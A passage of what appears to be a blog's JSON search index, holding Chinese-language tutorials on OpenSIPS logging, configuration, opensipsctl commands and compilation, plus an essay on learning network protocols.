/etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务\n*/10 * * * * /usr/sbin/logrotate /etc/logrotate.d/opensips ","permalink":"https://wdd.js.org/opensips/ch3/log/","summary":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 
第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务","title":"设置独立日志文件"},{"content":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.0.0.10\u0026#34;; t_relay(); } } 脚本一般由三个部分组成:\n全局参数配置 模块加载与参数配置 路由逻辑 全局参数配置 debug=2 # log level 2 (NOTICE) debug值越大,日志越详细 log_stderror=0 #log to syslog log_facility=LOG_LOCAL0 
log_name=\u0026#34;sbc\u0026#34; listen=udp:127.0.0.1:5060 listen=tcp:192.168.1.5:5060 as 10.10.1.10:5060 listen=tls:192.168.1.5:5061 advertised_address=7.7.7.7 #global option, for all listeners 模块加载与参数配置 按照绝对路径加载模块\nloadmodules \u0026#34;/lib/opensips/modules/rr.so\u0026#34; loadmodules \u0026#34;/lib/opensips/modules/tm.so\u0026#34; 统一前缀加载模块\nmpath=\u0026#34;/lib/opensips/modules/\u0026#34; loadmodules \u0026#34;rr.so\u0026#34; loadmodules \u0026#34;tm.so\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch5/routing-script/","summary":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.","title":"配置文件"},{"content":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 
如果有问题,会提示哪行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分号了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .............................. start OpenSIPS stop ............................... stop OpenSIPS -- command \u0026#39;acl\u0026#39; - manage access control lists (acl) acl show [\u0026lt;username\u0026gt;] .............. show user membership acl grant \u0026lt;username\u0026gt; \u0026lt;group\u0026gt; ....... grant user membership (*) acl revoke \u0026lt;username\u0026gt; [\u0026lt;group\u0026gt;] .... grant user membership(s) (*) -- command \u0026#39;cr\u0026#39; - manage carrierroute tables cr show ....................................................... show tables cr reload ..................................................... reload tables cr dump ....................................................... show in memory tables cr addrt \u0026lt;routing_tree_id\u0026gt; \u0026lt;routing_tree\u0026gt; ..................... add a tree cr rmrt \u0026lt;routing_tree\u0026gt; ....................................... rm a tree cr addcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;rewrite_host\u0026gt; ................ \u0026lt;prob\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;rewrite_prefix\u0026gt; \u0026lt;rewrite_suffix\u0026gt; ............... 
\u0026lt;flags\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;comment\u0026gt; .........................add a carrier (prob, strip, rewrite_prefix, rewrite_suffix,................... flags, mask and comment are optional arguments) ............... cr rmcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; ................ rm a carrier -- command \u0026#39;rpid\u0026#39; - manage Remote-Party-ID (RPID) rpid add \u0026lt;username\u0026gt; \u0026lt;rpid\u0026gt; ......... add rpid for a user (*) rpid rm \u0026lt;username\u0026gt; ................. set rpid to NULL for a user (*) rpid show \u0026lt;username\u0026gt; ............... show rpid of a user -- command \u0026#39;add|passwd|rm\u0026#39; - manage subscribers add \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; .......... add a new subscriber (*) passwd \u0026lt;username\u0026gt; \u0026lt;passwd\u0026gt; ......... change user\u0026#39;s password (*) rm \u0026lt;username\u0026gt; ...................... delete a user (*) -- command \u0026#39;add|dump|reload|rm|show\u0026#39; - manage address address show ...................... show db content address dump ...................... show cache content address reload .................... reload db table into cache address add \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; \u0026lt;proto\u0026gt; [\u0026lt;context_info\u0026gt;] [\u0026lt;pattern\u0026gt;] ....................... add a new entry ....................... (from_pattern and tag are optional arguments) address rm \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; ............... remove all entries ....................... 
for the given grp ip mask port -- command \u0026#39;dr\u0026#39; - manage dynamic routing * Examples: dr addgw \u0026#39;1\u0026#39; 10 \u0026#39;192.168.2.2\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW001\u0026#39; 0 \u0026#39;first_gw\u0026#39; * dr addgw \u0026#39;2\u0026#39; 20 \u0026#39;192.168.2.3\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW002\u0026#39; 0 \u0026#39;second_gw\u0026#39; * dr rmgw 2 * dr addgrp \u0026#39;alice\u0026#39; \u0026#39;example.com\u0026#39; 10 \u0026#39;first group\u0026#39; * dr rmgrp 1 * dr addcr \u0026#39;cr_1\u0026#39; \u0026#39;10\u0026#39; 0 \u0026#39;CARRIER_1\u0026#39; \u0026#39;first_carrier\u0026#39; * dr rmcr 1 * dr addrule \u0026#39;10,20\u0026#39; \u0026#39;+1\u0026#39; \u0026#39;20040101T083000\u0026#39; 0 0 \u0026#39;1,2\u0026#39; \u0026#39;NA_RULE\u0026#39; \u0026#39;NA routing\u0026#39; * dr rmrule 1 dr show ............................ show dr tables dr addgw \u0026lt;gwid\u0026gt; \u0026lt;type\u0026gt; \u0026lt;address\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;pri_prefix\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;probe_mode\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway dr rmgw \u0026lt;id\u0026gt; ....................... delete gateway dr addgrp \u0026lt;username\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;groupid\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway group dr rmgrp \u0026lt;id\u0026gt; ...................... delete gateway group dr addcr \u0026lt;carrierid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;flags\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ........................... add carrier dr rmcr \u0026lt;id\u0026gt; ....................... delete carrier dr addrule \u0026lt;groupid\u0026gt; \u0026lt;prefix\u0026gt; \u0026lt;timerec\u0026gt; \u0026lt;priority\u0026gt; \u0026lt;routeid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ................................. 
add rule dr rmrule \u0026lt;ruleid\u0026gt; ................. delete rule dr reload .......................... reload dr tables dr gw_status ....................... show gateway status dr carrier_status .................. show carrier status -- command \u0026#39;dispatcher\u0026#39; - manage dispatcher * Examples: dispatcher addgw 1 sip:1.2.3.1:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og1\u0026#39; \u0026#39;Outbound Gateway1\u0026#39; * dispatcher addgw 2 sip:1.2.3.4:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og2\u0026#39; \u0026#39;Outbound Gateway2\u0026#39; * dispatcher rmgw 4 dispatcher show ..................... show dispatcher gateways dispatcher reload ................... reload dispatcher gateways dispatcher dump ..................... show in memory dispatcher gateways dispatcher addgw \u0026lt;setid\u0026gt; \u0026lt;destination\u0026gt; \u0026lt;socket\u0026gt; \u0026lt;state\u0026gt; \u0026lt;weight\u0026gt; \u0026lt;attrs\u0026gt; [description] .......................... add gateway dispatcher rmgw \u0026lt;id\u0026gt; ................ delete gateway -- command \u0026#39;registrant\u0026#39; - manage registrants * Examples: registrant add sip:opensips.org \u0026#39;\u0026#39; sip:user@opensips.org \u0026#39;\u0026#39; user password sip:user@localhost \u0026#39;\u0026#39; 3600 \u0026#39;\u0026#39; registrant show ......................... show registrant table registrant dump ......................... show registrant status registrant add \u0026lt;registrar\u0026gt; \u0026lt;proxy\u0026gt; \u0026lt;aor\u0026gt; \u0026lt;third_party_registrant\u0026gt; \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;binding_URI\u0026gt; \u0026lt;binding_params\u0026gt; \u0026lt;expiry\u0026gt; \u0026lt;forced_socket\u0026gt; . add a registrant registrant rm ........................... removes the entire registrant table registrant rmaor \u0026lt;id\u0026gt; ................... 
removes the gived aor id -- command \u0026#39;db\u0026#39; - database operations db exec \u0026lt;query\u0026gt; ..................... execute SQL query db roexec \u0026lt;roquery\u0026gt; ................. execute read-only SQL query db run \u0026lt;id\u0026gt; ......................... execute SQL query from $id variable db rorun \u0026lt;id\u0026gt; ....................... execute read-only SQL query from $id variable db show \u0026lt;table\u0026gt; ..................... display table content -- command \u0026#39;speeddial\u0026#39; - manage speed dials (short numbers) speeddial show \u0026lt;speeddial-id\u0026gt; ....... show speeddial details speeddial list \u0026lt;sip-id\u0026gt; ............. list speeddial for uri speeddial add \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; \u0026lt;new-uri\u0026gt; [\u0026lt;desc\u0026gt;] ... ........................... add a speedial (*) speeddial rm \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; ....... remove a speeddial (*) speeddial help ...................... help message - \u0026lt;speeddial-id\u0026gt;, \u0026lt;sd-id\u0026gt; must be an AoR (username@domain) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;new-uri\u0026gt; must be a SIP AoR (sip:username@domain) - \u0026lt;desc\u0026gt; a description for speeddial -- command \u0026#39;avp\u0026#39; - manage AVPs avp list [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... list AVPs avp add [-T table] \u0026lt;sip-id|uuid\u0026gt; \u0026lt;attribute\u0026gt; \u0026lt;type\u0026gt; \u0026lt;value\u0026gt; ............ add AVP (*) avp rm [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... remove AVP (*) avp help .................................. 
help message - -T - table name - -u - SIP id or unique id - -a - AVP name - -v - AVP value - -t - AVP name and type (0 (str:str), 1 (str:int), 2 (int:str), 3 (int:int)) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;uuid\u0026gt; must be a string but not AoR -- command \u0026#39;alias_db\u0026#39; - manage database aliases alias_db show \u0026lt;alias\u0026gt; .............. show alias details alias_db list \u0026lt;sip-id\u0026gt; ............. list aliases for uri alias_db add \u0026lt;alias\u0026gt; \u0026lt;sip-id\u0026gt; ...... add an alias (*) alias_db rm \u0026lt;alias\u0026gt; ................ remove an alias (*) alias_db help ...................... help message - \u0026lt;alias\u0026gt; must be an AoR (username@domain)\u0026#34; - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain)\u0026#34; -- command \u0026#39;domain\u0026#39; - manage local domains domain reload ....................... reload domains from disk domain show ......................... show current domains in memory domain showdb ....................... show domains in the database domain add \u0026lt;domain\u0026gt; ................. add the domain to the database domain rm \u0026lt;domain\u0026gt; .................. delete the domain from the database -- command \u0026#39;cisco_restart\u0026#39; - restart CISCO phone (NOTIFY) cisco_restart \u0026lt;uri\u0026gt; ................ restart phone configured for \u0026lt;uri\u0026gt; -- command \u0026#39;online\u0026#39; - dump online users from memory online ............................. display online users -- command \u0026#39;monitor\u0026#39; - show internal status monitor ............................ show server\u0026#39;s internal status -- command \u0026#39;ping\u0026#39; - ping a SIP URI (OPTIONS) ping \u0026lt;uri\u0026gt; ......................... 
ping \u0026lt;uri\u0026gt; with SIP OPTIONS -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry -- command \u0026#39;fifo\u0026#39; fifo ............................... send raw FIFO command ➜ ~ opopensipsctl ul /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) ERROR: usrloc - too few parameters -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry opensips命令 opensips -h\n有时候,你用opensipsctl start 启动opensips时,你可能会想,opensips是从哪个目录读取opensips.cfg文件的,那你可以输入opensips -h。输出的结果,第一行就包括了默认的配置文件的位置。\n-f file Configuration file (default /usr/local//etc/opensips/opensips.cfg) -c Check configuration file for errors -C Similar to \u0026#39;-c\u0026#39; but in addition checks the flags of exported functions from included route blocks -l address Listen on the specified address/interface (multiple -l mean listening on more addresses). The address format is [proto:]addr[:port], where proto=udp|tcp and addr= host|ip_address|interface_name. 
E.g: -l locahost, -l udp:127.0.0.1:5080, -l eth0:5062 The default behavior is to listen on all the interfaces. -n processes Number of worker processes to fork per UDP interface (default: 8) -r Use dns to check if is necessary to add a \u0026#34;received=\u0026#34; field to a via -R Same as `-r` but use reverse dns; (to use both use `-rR`) -v Turn on \u0026#34;via:\u0026#34; host checking when forwarding replies -d Debugging mode (multiple -d increase the level) -D Run in debug mode -F Daemon mode, but leave main process foreground -E Log to stderr -N processes Number of TCP worker processes (default: equal to `-n`) -W method poll method -V Version number -h This help message -b nr Maximum receive buffer size which will not be exceeded by auto-probing procedure even if OS allows -m nr Size of shared memory allocated in Megabytes 默认32MB -M nr Size of pkg memory allocated in Megabytes 默认2MB -w dir Change the working directory to \u0026#34;dir\u0026#34; (default \u0026#34;/\u0026#34;) -t dir Chroot to \u0026#34;dir\u0026#34; -u uid Change uid -g gid Change gid -P file Create a pid file -G file Create a pgid file ","permalink":"https://wdd.js.org/opensips/ch3/opensipsctl/","summary":"可以使用以下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示哪行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分号了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap 
............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .","title":"opensips管理命令"},{"content":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_modules可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/install-opensips/","summary":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_modules可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","title":"debian jessie opensips 2.4.7 安装"},{"content":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 
协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应用层负责处理特定的应用程序细节。 运输层主要为两台主机上的应用程序提供端到端的通信。 网络层处理分组在网络中的活动,例如分组的选路 链路层处理与电缆(或其他任何传输媒介)的物理接口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音和视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,即End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性由上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络层,\n那么端口号和ip地址到底有什么区别呢?\nip用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接收消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的哪个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并不厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","permalink":"https://wdd.js.org/posts/2019/01/books-about-network-protocol/","summary":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应用层负责处理特定的应用程序细节。 运输层主要为两台主机上的应用程序提供端到端的通信。 网络层处理分组在网络中的活动,例如分组的选路 链路层处理与电缆(或其他任何传输媒介)的物理接口细节 下面重点讲一下运输层和网络层\n1.1.
运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音和视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,即End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性由上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络层,\n那么端口号和ip地址到底有什么区别呢?\nip用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接收消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的哪个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并不厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","title":"如何学习网络协议?"},{"content":"什么是呼叫中心? 
